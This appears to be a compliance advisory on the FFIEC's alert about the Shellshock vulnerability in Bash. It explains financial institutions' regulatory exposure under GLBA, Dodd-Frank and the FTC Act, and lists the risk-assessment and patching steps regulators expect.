The Federal Financial Institutions Examination Council (FFIEC) recently issued an alert warning financial institutions of a security vulnerability nicknamed “Shellshock” in software commonly used in servers and other computing devices. The FFIEC said regulators should "expect financial institutions to conduct a risk assessment and address the Shellshock vulnerability" in not only their own systems, but with their third-party service providers.
Consequently, a financial institution’s failure to address this high-profile security issue could be a violation of the Gramm-Leach-Bliley Act's (GLBA) Safeguards Rule, an unfair, deceptive, or abusive act or practice (UDAAP) violation under Dodd-Frank. For nonbanking organizations, such a failure could violate Section 5 of the FTC Act. Businesses should act quickly to assess their risks from Shellshock and mitigate their exposure.
This latest vulnerability, found in the Bourne-Again Shell (Bash) system software, mainly affects systems and websites using the open-source Unix and Linux operating systems, as well as Apple's MacOS X platform. These operating systems are widely used on servers that host websites and e-mail, on systems that manage back-office operations, and on systems that control facilities' physical security operations. These open-source platforms are also used by many companies to develop customized internal software solutions. The Bash aspect of the systems provides users with an interface to enter commands that execute programs.
The Shellshock vulnerability stems from a flaw in Bash through which remote users could execute commands to gain access to the system, bypassing other security controls. This flaw has existed for decades, but was only recently discovered. Within days of the discovery, security researchers identified criminals attempting to exploit this vulnerability, which could enable attackers to inject harmful scripts or malware, intercept encrypted communications, steal user credentials or data, or access an institution's internal networks. These attacks could lead to the loss of data, operational disruptions, or cases of fraud.
While multiple software patches have been released to address Shellshock, security researchers worry that because Bash is used across a wide variety of systems, these patches may not be applied to all affected systems. The ubiquitous use of Bash presents a challenge to ensure that all vulnerable systems are accounted for and updated.
In its alert, the FFIEC told financial institutions and other covered entities that it expects them to conduct risk assessments to identify systems vulnerable to Shellshock. This assessment should include:
-
Identifying all servers, systems, and appliances that use vulnerable versions of Bash, applying the necessary software patches, and testing to ensure the patches' effectiveness
-
Applying mechanisms to filter malicious traffic away from vulnerable websites and services
-
Monitoring systems for malicious or unusual activity and updating any detection and prevention systems
-
Ensuring all third-party service providers are taking appropriate actions to identify and mitigate risk and monitoring their efforts
-
Reviewing systems to see if the Shellshock vulnerability has been exploited, and if necessary, determining the potential effects of any breach
The FFIEC advises financial institutions to stay updated on cybersecurity threats through the U.S. Computer Emergency Readiness Team's (US-CERT) portal or through the Financial Services Information Sharing and Analysis Center. Financial institutions and businesses that collect consumers' personally identifiable information should incorporate security alerts from regulators and information-sharing organizations into their information security programs. Failing to respond to the latest security threats—especially those that a regulator warns against—not only puts corporate assets, reputation, and consumer information at higher risk of a costly data breach, but also increases the risk of regulatory action.
